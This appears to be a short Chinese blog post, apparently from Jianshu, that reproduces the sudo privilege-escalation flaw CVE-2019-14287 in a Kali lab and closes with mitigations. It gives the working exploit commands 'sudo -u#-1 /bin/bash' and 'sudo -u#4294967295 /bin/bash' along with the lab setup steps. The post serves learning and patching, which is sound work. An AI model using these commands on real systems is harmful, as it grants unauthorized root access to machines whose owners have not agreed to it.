CVE-2019-14287(sudo提权)漏洞复现

利用前提：

1.sudo版本<1.8.28
2.知道当前用户密码
3.当前用户存在于sudo权限列表

kali

首先查看sudo的版本

sudo -V

创建用户test

useradd test
passwd test
由于是新创建的用户，为满足第三个条件，需要编辑sudoers文件把test写入sudo权限列表。

visudo（sudo权限配置通过visudo命令打开系统默认编辑器打开/etc/sudoers文件来配置。）

visudo

sudo的权限配置条目的格式为：
授权用户主机=[(切换到哪些用户或用户组)] [是否需要密码验证] 命令动作。[]中的内容可省略，多条命令之间用","分隔。
切换到test用户

输入sudo -u#-1 /bin/bash或者sudo -u#4294967295 /bin/bash查看是否利用成功

复现完成

1.升级sudo到1.8.28版本
2.做好sudo用户列表管理

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

赞1赞

赞赏

手机看全文